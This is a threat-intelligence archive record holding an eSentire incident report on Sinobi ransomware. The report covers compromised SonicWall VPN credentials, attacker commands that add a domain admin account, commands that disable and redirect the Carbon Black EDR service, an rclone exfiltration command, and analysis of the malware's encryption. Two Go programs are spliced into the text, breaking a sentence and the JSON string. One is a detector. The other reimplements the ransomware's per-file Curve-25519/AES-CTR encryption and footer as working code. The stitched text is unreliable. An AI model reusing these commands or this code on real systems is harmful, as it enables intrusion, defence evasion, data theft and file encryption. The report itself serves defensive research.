{
	"id": "8f116675-4654-4bbf-9763-a469ae747153",
	"created_at": "2026-04-06T00:12:57.375563Z",
	"updated_at": "2026-04-10T13:11:44.508084Z",
	"deleted_at": null,
	"sha1_hash": "410756807c42a3d9972e6eb6350d26b46406173b",
	"title": "Threat Actors Deploy Sinobi Ransomware via Compromised SonicWall SSL VPN Credentials",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2496095,
	"plain_text": "Threat Actors Deploy Sinobi Ransomware via Compromised\r\nSonicWall SSL VPN Credentials\r\nBy eSentire Threat Response Unit (TRU)\r\nArchived: 2026-04-05 18:09:16 UTC\r\nAdversaries don’t work 9-5 and neither do we. At eSentire, our 24/7 SOCs are staffed with Elite Threat Hunters\r\nand Cyber Analysts who hunt, investigate, contain and respond to threats within minutes.\r\nWe have discovered some of the most dangerous threats and nation state attacks in our space – including the\r\nKaseya MSP breach and the more_eggs malware.\r\nOur Security Operations Centers are supported with Threat Intelligence, Tactical Threat Response and Advanced\r\nThreat Analytics driven by our Threat Response Unit – the TRU team.\r\nIn TRU Positives, eSentire’s Threat Response Unit (TRU) provides a summary of a recent threat investigation. We\r\noutline how we responded to the confirmed threat and what recommendations we have going forward.\r\nHere’s the latest from our TRU Team…\r\nWhat did we find?\r\nIn August 2025, eSentire's Threat Response Unit (TRU) detected a ransomware attack attributed to an affiliate of\r\nSinobi Group. Due to significant code overlaps and other similarities in the ransomware binaries and data leak\r\nsites, Sinobi is suspected to be a rebrand of Lynx, a Ransomware-as-a-Service (RaaS) group that first emerged in\r\n2024.\r\nWith medium confidence, it is believed Lynx purchased the INC Ransomware source code from the user,\r\n“salfetka” (Russian word for “napkin”) who allegedly advertised it for sale via Exploit/XSS hacking forums.\r\nFigure 1 – Sales advert on hacking forum by salfetka, source: BleepingComputer/KELA\r\nhttps://www.esentire.com/blog/threat-actors-deploy-sinobi-ransomware-via-compromised-sonicwall-ssl-vpn-credentials\r\nPage 1 of 13\n\nThe group successfully uninstalled Carbon Black EDR before exfiltrating sensitive data from a mapped network\r\ndrive using RClone. 
The attack culminated in the deployment of Sinobi Ransomware, which encrypted files across\r\nlocal and shared network drives, leaving behind ransom notes and files marked by the .SINOBI file extension.\r\nInitial Access\r\nA Sinobi Group affiliate leveraged compromised third-party MSP SonicWall SSL VPN credentials that mapped to\r\nan over-privileged Active Directory account (domain administrator rights), enabling internal network access and\r\ndirect RDP access to a file server.\r\nUsing the compromised account, the threat actors executed commands to create a new local administrator account,\r\nset its password, and add it to the Domain Admins group. Both the initial compromised account and the\r\nnewly created account were subsequently used for lateral movement throughout the network.\r\ncmd /c net localgroup administrators Assistance /add\r\ncmd /c net user Assistance /add\r\ncmd /c net localgroup \"domain admins\" Assistance /add\r\nThe threat actors initially attempted to uninstall Carbon Black using Revo Uninstaller and various command-line\r\noperations, but these efforts were unsuccessful. They ultimately succeeded in uninstalling Carbon Black\r\nfrom the file server, possibly after discovering the deregistration code stored on the file server itself, on a mapped\r\ndrive or network share. The observed service-control commands disabled the Carbon Black sensor service (cbdefense)\r\nand re-pointed its binary path at C:\\programdata\\bin.exe, the same file name the Sinobi payload used, before\r\nforcing a reboot:\r\nsc config cbdefense start= disabled\r\ncmd /c sc config cbdefense binpath= \"C:\\programdata\\bin.exe\" \u0026 shutdown /r /t 0\r\nThe Sinobi Group affiliate then exfiltrated data using RClone, a legitimate, well-known, and frequently abused\r\ncommand-line utility used to transfer files to cloud storage. 
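The account-creation and service-tampering commands quoted above are exactly the process-creation telemetry (Sysmon Event ID 1 or Windows Security 4688 CommandLine fields) a SOC can alert on. The Go program below is an added example written for this page, not eSentire code or tooling. It runs three assumed rules over constructed command lines modelled on the ones above: net user NAME /add creates a local account; net localgroup GROUP NAME /add places an account in a privileged group (higher severity when that account was created earlier in the same batch or the group is domain-wide); and sc config against a known EDR service either disables its start type or redirects its binary path (critical when the new path sits under ProgramData, Temp or a user profile). The service names beyond cbdefense, the group list, the path heuristic and the severities are illustrative choices, not values from the incident.

```go
package main

import (
    `fmt`
    `strings`
)

// finding is one alert raised over a single process-creation command line.
type finding struct {
    severity string
    rule     string
    cmdline  string
}

// Service names whose reconfiguration should alert. cbdefense is the Carbon Black
// sensor service from the commands above; the other two are assumed additions.
var edrServices = map[string]bool{`cbdefense`: true, `sense`: true, `csfalconservice`: true}

var privilegedGroups = []string{`domain admins`, `enterprise admins`, `administrators`}

// Constructed process-creation command lines modelled on the commands quoted above,
// mixed with benign admin activity; they are not records from the incident.
var sampleCommandLines = []string{
    `C:\\Windows\\System32\\svchost.exe -k netsvcs`,
    `cmd /c net user Assistance /add`,
    `cmd /c net localgroup administrators Assistance /add`,
    `cmd /c net localgroup \"domain admins\" Assistance /add`,
    `sc query cbdefense`,
    `sc config cbdefense start= disabled`,
    `cmd /c sc config cbdefense binpath= \"C:\\programdata\\bin.exe\" & shutdown /r /t 0`,
}

// normalize lower-cases the command line, drops double-quote (U+0022) and backslash
// (U+005C) characters so quoted group names and escaped paths compare the same way
// regardless of how the log shipper quoted them, and collapses runs of whitespace.
func normalize(cmd string) string {
    stripped := strings.NewReplacer(string(rune(34)), ``, string(rune(92)), ``).Replace(strings.ToLower(cmd))
    return strings.Join(strings.Fields(stripped), ` `)
}

// fieldAfter returns the token following the first occurrence of marker, or an empty string.
func fieldAfter(tokens []string, marker string) string {
    for i, t := range tokens {
        if t == marker && i+1 < len(tokens) {
            return tokens[i+1]
        }
    }
    return ``
}

// analyzeCommandLines applies the three rules to a batch of command lines in order, so an
// account created earlier in the batch raises the severity of a later group addition.
func analyzeCommandLines(lines []string) []finding {
    var out []finding
    created := map[string]bool{}
    for _, raw := range lines {
        cmd := normalize(raw)
        tok := strings.Fields(cmd)
        switch {
        case strings.Contains(cmd, `net user `) && strings.HasSuffix(cmd, ` /add`):
            created[fieldAfter(tok, `user`)] = true
            out = append(out, finding{`medium`, `local account created via net user`, raw})
        case strings.Contains(cmd, `net localgroup `) && strings.HasSuffix(cmd, ` /add`):
            acct := tok[len(tok)-2] // the token before /add is the member being added
            for _, g := range privilegedGroups {
                if !strings.Contains(cmd, `localgroup `+g+` `) {
                    continue
                }
                sev := `medium`
                if created[acct] || g != `administrators` { // freshly created account, or a domain-wide group
                    sev = `high`
                }
                out = append(out, finding{sev, `account added to ` + g, raw})
            }
        case strings.Contains(cmd, `sc config `) && edrServices[fieldAfter(tok, `config`)]:
            switch {
            case strings.Contains(cmd, `start= disabled`) || strings.Contains(cmd, `start=disabled`):
                out = append(out, finding{`high`, `EDR service start type set to disabled`, raw})
            case strings.Contains(cmd, `binpath=`):
                sev := `high`
                // a sensor binary under ProgramData, Temp or a user profile is not the vendor install location
                if strings.Contains(cmd, `programdata`) || strings.Contains(cmd, `temp`) || strings.Contains(cmd, `users`) {
                    sev = `critical`
                }
                out = append(out, finding{sev, `EDR service binary path redirected`, raw})
            }
        }
    }
    return out
}

func main() {
    for _, f := range analyzeCommandLines(sampleCommandLines) {
        fmt.Println(f.severity, `|`, f.rule, `|`, f.cmdline)
    }
}
```

Run against the constructed batch the program raises five findings (medium for the account creation, high for both group additions and for the disabled start type, critical for the binary path redirected into ProgramData) and nothing for the benign lines; in production the same rules would be fed from the EDR or SIEM process-creation stream rather than a static slice.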
Exfiltrated data was sent to an IP address belonging to\r\nASN 215540 (Global Connectivity Solutions LLP), a hosting provider TRU has commonly observed in other\r\ncyberattacks.\r\nrclone.exe --config=c:\\programdata\\rclone-ssh.conf copy \u003cREDACTED_SRC_PATH\u003e remote:\u003cREDACTED_DEST_PATH\u003e --max-a\r\nAnalysis of Sinobi Ransomware (bin.exe)\r\nSinobi Ransomware is suspected to be a rebrand of Lynx Ransomware due to significant code overlaps between\r\nthe Lynx and Sinobi ransomware binaries and leak sites. eSentire has uploaded the binary in question to\r\nVirusTotal for security researchers to download.\r\nFigure 2 – Lynx vs Sinobi code comparison\r\nThe next figure shows the menu bar of the new Sinobi data leak website alongside the old Lynx data leak website,\r\nfurther contributing to the suspicion of Sinobi being a rebrand.\r\nFigure 3 – Lynx vs Sinobi leak-site comparison\r\nSinobi ransomware uses Curve-25519 (the curve25519-donna implementation) with AES-128-CTR to encrypt files,\r\nmaking recovery impossible without the attacker’s Curve-25519 private key. The same scheme is used by other\r\nransomware families such as Babuk. 
It uses multi-threading and completion ports to read/write files efficiently and generates a new key per file\r\nvia CryptGenRandom.\r\nUsage instructions (shown below) for the ransomware can be printed by passing the --help command line option.\r\nFigure 4 – Usage instructions for Sinobi Ransomware\r\nPrior to encrypting files, the ransomware deletes all files in the Recycle Bin via the SHEmptyRecycleBinA API,\r\nensuring that files that were in the Recycle Bin cannot be restored.\r\nFigure 5 – Usage of SHEmptyRecycleBinA to empty the recycle bin\r\nThe next figure shows the code responsible for enumerating hidden drives/volumes and mounting them,\r\neffectively maximizing the extent of damage caused in the file enumeration/encryption process.\r\nFigure 6 – Enumeration/mounting of hidden drives\r\nVolume shadow copies are deleted through a technique that makes use of DeviceIoControl with the\r\nIOCTL_VOLSNAP_SET_MAX_DIFF_AREA_SIZE control code (0x53C028) and 0 for the input buffer, resizing\r\nthe space reserved for shadow copies to 0, which causes Windows to delete them. This technique was previously\r\nreported in 2020 by Fortinet’s Ben Hunter (see References).\r\nFigure 7 – Volume Shadow Copy deletion via DeviceIoControl with\r\nIOCTL_VOLSNAP_SET_MAX_DIFF_AREA_SIZE\r\nIf the --kill command line option was specified by the attacker, it proceeds to kill processes matching the following\r\nnames:\r\nsql\r\nveeam\r\nbackup\r\nexchange\r\njava\r\nnotepad\r\nIt then spawns a thread per file which generates Curve-25519 keys and makes use of Restart Manager APIs to find\r\nand kill processes with open handles to the file. 
It also creates an ACE that grants the Everyone SID\r\nGENERIC_ALL, and attempts to set that DACL on the file.\r\nIf that fails, it enables SeTakeOwnershipPrivilege, attempts to set the owner to that SID, and then sets the DACL\r\nagain, effectively granting full control of the file to everyone. Afterwards, it queues the file for encryption via\r\ncompletion ports.\r\nFigure 8 – Usage of Restart Manager API to find/kill processes with open handles\r\nFigure 9 – Full access to Everyone SID and taking ownership of file\r\nThe attacker’s base64 encoded Curve-25519 public key is decoded to binary form (32 bytes) by calling\r\nCryptStringToBinaryA with the CRYPT_STRING_BASE64 flag. Immediately after, the AES-128-CTR key and\r\ncounter are generated through a function call at offset 0x67A2 (shown below as\r\nmw_curve_25519_gen_aes_key_counter).\r\nFigure 10 – Decoding attacker Curve-25519 public key from base64 and generating AES\r\nkey/counter\r\nThe next figure displays the code responsible for generating each file’s Curve-25519 private key, which is\r\ndiscarded after use; if it were retained, it could be used to compute each shared secret, derive the AES key/counter,\r\nand decrypt each file.\r\nFigure 11 – Curve-25519 private key generation via CryptGenRandom\r\nThe figure below displays the code responsible for clamping the victim’s Curve-25519 private key, computing the\r\nCurve-25519 public key/shared secret, and SHA512 hashing the public key and shared secret. 
The SHA512 hash\r\nof the shared secret is used in deriving the AES key (first 16 bytes), and counter block bytes (latter 16 bytes).\r\nFigure 12 – Deriving public key and shared secret, SHA512 shared secret\r\nThe next figure shows the AES round key generation function and the point at which the encrypted file name, chunk\r\nsize, and encryption mode are queued for processing via completion ports.\r\nFigure 13 – Generate encrypted file name, AES round keys, mode, chunk size\r\nEach encrypted file is appended with a footer (annotated below) for the threat actors (who have the Curve-25519\r\nprivate key) to decrypt files. The threat actor’s decrypter will parse this footer, extract the victim file’s public key\r\nbytes, compute the shared secret via Elliptic Curve Diffie-Hellman (ECDH) key exchange with their Curve-25519\r\nprivate key, and SHA512 it.\r\nThe resulting SHA512 hash is used to derive the AES key (first 16 bytes) and counter block bytes (latter 16 bytes) to\r\ndecrypt the file. The footer also contains a magic value, “SINOBI”, the chunking size (0xF4240), and a boolean\r\nindicating whether the file was encrypted in its entirety.\r\nFigure 14 – Encrypted file containing file footer\r\nSinobi writes a ransom note titled README.txt to each directory in which a file is encrypted. The note contains\r\ninstructions for the victim, extorting them into paying the ransom or risk having stolen data leaked on the dark web.\r\nFigure 15 – Content of the ransom note in the README.txt file\r\nThe victim’s wallpaper is then set to the following image, which is generated on the fly and written to disk. 
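To make the key handling above concrete, the Go program below is an added example written for this page; it is not the ransomware's code, eSentire's validation script, or output of either. It implements the scheme as the analysis describes it using only the Go standard library (crypto/ecdh for Curve-25519, crypto/sha512, crypto/aes in CTR mode; Go 1.20 or later is assumed): a per-file X25519 key pair, ECDH against the attacker public key, SHA-512 of the shared secret split into the AES-128 key (first 16 bytes) and counter block (the next 16 bytes, our reading of latter 16 bytes), AES-128-CTR over the file, and a trailing footer carrying the per-file public key, the 0xF4240 chunk size, the full-encryption flag and the SINOBI magic. The order of the footer fields, the little-endian encoding of the chunk size and the rule that only the first chunk of an oversized file is encrypted are assumptions: the analysis names those fields but not their layout. The attacker key pair is generated fresh at run time, so nothing here decrypts real Sinobi files.

```go
package main

import (
    `bytes`
    `crypto/aes`
    `crypto/cipher`
    `crypto/ecdh`
    `crypto/rand`
    `crypto/sha512`
    `encoding/binary`
    `errors`
    `fmt`
)

const (
    magic     = `SINOBI` // footer magic named in the analysis
    chunkSize = 0xF4240  // chunking size recorded in the footer (1,000,000 bytes)
    footerLen = 32 + 4 + 1 + len(magic)
)

// deriveKeyCounter: SHA-512 over the X25519 shared secret; the first 16 bytes become the
// AES-128 key and the next 16 the initial CTR counter block (our reading of 'latter 16 bytes').
func deriveKeyCounter(shared []byte) (key, counter []byte) {
    h := sha512.Sum512(shared)
    return h[:16], h[16:32]
}

// ctrXOR runs AES-128-CTR over data; the same call encrypts and decrypts.
func ctrXOR(key, counter, data []byte) ([]byte, error) {
    block, err := aes.NewCipher(key)
    if err != nil { return nil, err }
    out := make([]byte, len(data))
    cipher.NewCTR(block, counter).XORKeyStream(out, data)
    return out, nil
}

// encryptFile plays the ransomware side: it holds only the attacker public key.
// Assumed footer layout (the analysis names the fields, not their order or encoding):
// [32-byte per-file public key][uint32 LE chunk size][1-byte full flag][SINOBI magic].
func encryptFile(attackerPub *ecdh.PublicKey, plaintext []byte) ([]byte, error) {
    filePriv, err := ecdh.X25519().GenerateKey(rand.Reader) // stands in for CryptGenRandom + clamping
    if err != nil { return nil, err }
    shared, err := filePriv.ECDH(attackerPub)
    if err != nil { return nil, err }
    key, ctr := deriveKeyCounter(shared)
    // Assumed policy for large files: only the first chunk is encrypted and full=0; the
    // sample's real partial-encryption rule is not described in the analysis.
    encLen, full := len(plaintext), byte(1)
    if encLen > chunkSize { encLen, full = chunkSize, 0 }
    ct, err := ctrXOR(key, ctr, plaintext[:encLen])
    if err != nil { return nil, err }
    out := append(ct, plaintext[encLen:]...)
    // filePriv is dropped here and never written out; only its public half is stored,
    // so the shared secret can be recomputed only with the attacker private key.
    out = append(out, filePriv.PublicKey().Bytes()...)
    out = binary.LittleEndian.AppendUint32(out, chunkSize)
    out = append(out, full)
    return append(out, magic...), nil
}

// parseFooter splits an encrypted blob into its body and the footer fields.
func parseFooter(blob []byte) (body, filePub []byte, chunk uint32, full bool, err error) {
    if len(blob) < footerLen { return nil, nil, 0, false, errors.New(`blob shorter than the footer`) }
    body, tail := blob[:len(blob)-footerLen], blob[len(blob)-footerLen:]
    if string(tail[37:]) != magic { return nil, nil, 0, false, errors.New(`missing SINOBI magic`) }
    return body, tail[:32], binary.LittleEndian.Uint32(tail[32:36]), tail[36] == 1, nil
}

// decryptFile plays the threat actor decrypter: parse the footer, ECDH with the attacker
// private key, SHA-512, then AES-128-CTR over the encrypted region only.
func decryptFile(attackerPriv *ecdh.PrivateKey, blob []byte) ([]byte, error) {
    body, pubBytes, chunk, full, err := parseFooter(blob)
    if err != nil { return nil, err }
    filePub, err := ecdh.X25519().NewPublicKey(pubBytes)
    if err != nil { return nil, err }
    shared, err := attackerPriv.ECDH(filePub)
    if err != nil { return nil, err }
    key, ctr := deriveKeyCounter(shared)
    encLen := len(body)
    if !full && int(chunk) < encLen { encLen = int(chunk) }
    pt, err := ctrXOR(key, ctr, body[:encLen])
    if err != nil { return nil, err }
    return append(pt, body[encLen:]...), nil
}

// roundTrip checks that the attacker private key recovers the plaintext and an unrelated key does not.
func roundTrip(plaintext []byte) (bool, error) {
    curve := ecdh.X25519()
    attacker, err := curve.GenerateKey(rand.Reader)
    if err != nil { return false, err }
    other, err := curve.GenerateKey(rand.Reader)
    if err != nil { return false, err }
    blob, err := encryptFile(attacker.PublicKey(), plaintext)
    if err != nil { return false, err }
    got, err := decryptFile(attacker, blob)
    if err != nil { return false, err }
    wrong, err := decryptFile(other, blob)
    if err != nil { return false, err }
    return bytes.Equal(got, plaintext) && !bytes.Equal(wrong, plaintext), nil
}

func main() {
    ok, err := roundTrip([]byte(`constructed sample document contents`))
    fmt.Println(`attacker key recovers plaintext and an unrelated key does not:`, ok, err)
}
```

roundTrip also decrypts with an unrelated X25519 key to show why recovery without the attacker private key fails: the per-file private key is gone, the footer exposes only the per-file public key, and X25519 gives an attacker-side party nothing to work with without the matching scalar. The decrypt path is the same logic a researcher would use to test a recovered private key against a sample, which is the purpose of the validation script described above.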
The\r\nimage written to disk is then set in the registry value HKCU\\Control Panel\\Desktop\\Wallpaper, effectively setting\r\nthe wallpaper of the victim machine programmatically.\r\nFigure 16 – Ransom note wallpaper\r\nBecause the usage of Curve-25519 + AES-128-CTR is relatively common in ransomware, eSentire has created a\r\nPython script (published with the original post) to validate the ciphertext of ransomware variants that make use of the\r\nmethods described herein.\r\nThis can be used by ransomware researchers as a “shortcut” to determine whether a ransomware developer\r\nmaking use of this technique made an error in their code, leading to the potential of creating a decryption utility\r\nfor victims. It is also worth noting that the method used in generating the Curve-25519 private key is another\r\npotential avenue to decrypt victim files, e.g. keys generated through non-cryptographically secure means.\r\nUnfortunately, Sinobi ransomware generates keys via CryptGenRandom, which is considered to be a\r\ncryptographically secure pseudorandom number generator.\r\nFigure 17 – Script for ransomware researchers to verify crypto of ransomware using Curve-25519\r\n+ AES-128-CTR + SHA512\r\nWhat did we do?\r\nOur team of 24/7 SOC Cyber Analysts proactively isolated the affected host to contain the infection on the\r\ncustomer’s behalf.\r\nWe communicated what happened with the customer and helped them with remediation efforts.\r\nWhat can you learn from this TRU Positive?\r\nSinobi Ransomware is likely a rebrand of Lynx Ransomware and makes use of Curve-25519 + AES-128-\r\nCTR to encrypt victim files, making recovery impossible without the attacker’s private key.\r\nSinobi Group affiliates leveraged compromised third-party MSP credentials for SonicWall SSL VPN\r\naccess, using this trusted relationship to gain initial network access and conduct lateral 
movement across\r\nthe victim organization.\r\nRecommendations from the Threat Response Unit (TRU)\r\nAvoid storing “uninstall” codes for your Endpoint Detection and Response (EDR) tool in file shares and\r\nother mediums that may become accessible to an attacker.\r\nOrganizations should strictly avoid assigning excessive privileges to remote access accounts, particularly\r\nVPN users. In this incident, the compromise of SonicWall SSL VPN credentials that possessed Active\r\nDirectory domain administrator rights enabled the threat actors to gain immediate, elevated access to\r\ncritical infrastructure.\r\nImplement a comprehensive vulnerability management program, with a robust patch management solution and\r\nprocess, to ensure systems are up to date with the latest security patches before exposing them to the\r\nInternet.\r\nConfigure the anti-tampering features of your endpoint security products, whether Next-Gen AV (NGAV) or Endpoint\r\nDetection and Response (EDR). 
Though not foolproof, these settings add an extra layer of defense against\r\nattackers attempting to disable your security tools.\r\nIndicators of Compromise\r\nIndicators of Compromise are published with the original post.\r\nReferences\r\nhttps://www.bleepingcomputer.com/news/security/inc-ransomware-source-code-selling-on-hacking-forums-for-300-000/\r\nhttps://github.com/sonicwall/sonicos-automation\r\nhttps://psirt.global.sonicwall.com/vuln-detail/SNWLID-2024-0015\r\nhttps://www.fortinet.com/blog/threat-research/stomping-shadow-copies-a-second-look-into-deletion-methods\r\nhttps://vampir3blu.es/posts/1/\r\nhttps://en.wikipedia.org/wiki/Diffie%E2%80%93Hellman_key_exchange\r\nhttps://www.cyfirma.com/news/weekly-intelligence-report-11-july-2025/\r\nhttps://www.picussecurity.com/resource/blog/lynx-ransomware\r\nTo learn how your organization can build cyber resilience and prevent business disruption with eSentire’s Next\r\nLevel MDR, connect with an eSentire Security Specialist now.\r\nABOUT ESENTIRE’S THREAT RESPONSE UNIT (TRU)\r\nThe eSentire Threat Response Unit (TRU) is an industry-leading threat research team committed to helping your\r\norganization become more resilient. TRU is an elite team of threat hunters and researchers that supports our 24/7\r\nSecurity Operations Centers (SOCs), builds threat detection models across the eSentire XDR Cloud Platform, and\r\nworks as an extension of your security team to continuously improve our Managed Detection and Response\r\nservice. 
By providing complete visibility across your attack surface and performing global threat sweeps and\r\nproactive hypothesis-driven threat hunts augmented by original threat research, we are laser-focused on defending\r\nyour organization against known and unknown threats.\r\nSource: https://www.esentire.com/blog/threat-actors-deploy-sinobi-ransomware-via-compromised-sonicwall-ssl-vpn-credentials",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.esentire.com/blog/threat-actors-deploy-sinobi-ransomware-via-compromised-sonicwall-ssl-vpn-credentials"
	],
	"report_names": [
		"threat-actors-deploy-sinobi-ransomware-via-compromised-sonicwall-ssl-vpn-credentials"
	],
	"threat_actors": [
		{
			"id": "c30358aa-384c-40ad-bac5-54aa6a40224a",
			"created_at": "2026-02-03T02:00:03.448178Z",
			"updated_at": "2026-04-10T02:00:03.945403Z",
			"deleted_at": null,
			"main_name": "Sinobi",
			"aliases": [],
			"source_name": "MISPGALAXY:Sinobi",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434377,
	"ts_updated_at": 1775826704,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/410756807c42a3d9972e6eb6350d26b46406173b.pdf",
		"text": "https://archive.orkl.eu/410756807c42a3d9972e6eb6350d26b46406173b.txt",
		"img": "https://archive.orkl.eu/410756807c42a3d9972e6eb6350d26b46406173b.jpg"
	}
}